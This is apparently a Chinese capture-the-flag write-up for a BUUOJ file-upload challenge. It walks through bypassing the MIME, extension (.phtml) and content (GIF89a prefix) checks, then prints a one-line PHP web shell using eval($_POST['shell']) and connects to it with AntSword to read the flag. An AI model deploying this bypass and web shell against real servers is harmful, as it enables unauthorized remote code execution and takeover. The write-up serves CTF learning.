1.随便上传一个东西,我上传的是一个txt文档,提示 "not image";
2.不是图片格式,那就抓包改消息头
改为 :
3.上传后提示“don't lie to me,it's not image at all!"
应该是存在过滤,试试其他的格式:
改成php,提示“not php!”
改成php3,提示"not php3!"
之后又试了一下php4,也是不行,
最后试了一下phtml,提示“don't lie to me,it's not image at all!"
这样发现其实如果后缀有过滤就会提示,但是出现其他提示语句,肯定存在别的过滤,我就上网查了一下,是对内容有过滤,需要在内容上前加上GIF89?,我没有一开始就用一句话木马,没有得到更有效的提示:
4.基于题解上,构造payload(复制到文档里就行)
GIF89a?
<script language="php">eval($_POST['shell']);
phpinfo();//我是用来看一句话木马是否传进去了
</script>
提示:
5.需要知道自己的木马下载到了哪个文件夹里,我看了一下上传的路径
http://63341727-b3f0-4e97-a382-adc41764fe47.node4.buuoj.cn:81/upload_file.php
我就直接输入的(想着试试,因为php是upload,没寻思真的就是)
63341727-b3f0-4e97-a382-adc41764fe47.node4.buuoj.cn:81/upload
6.进到上传的文档里a.phtml
证明木马确实成功上传了
7.用中国蚁剑连接
添加数据
测试连接成功
双击进去
在根目录下有flag文件,双击进入即可获取flag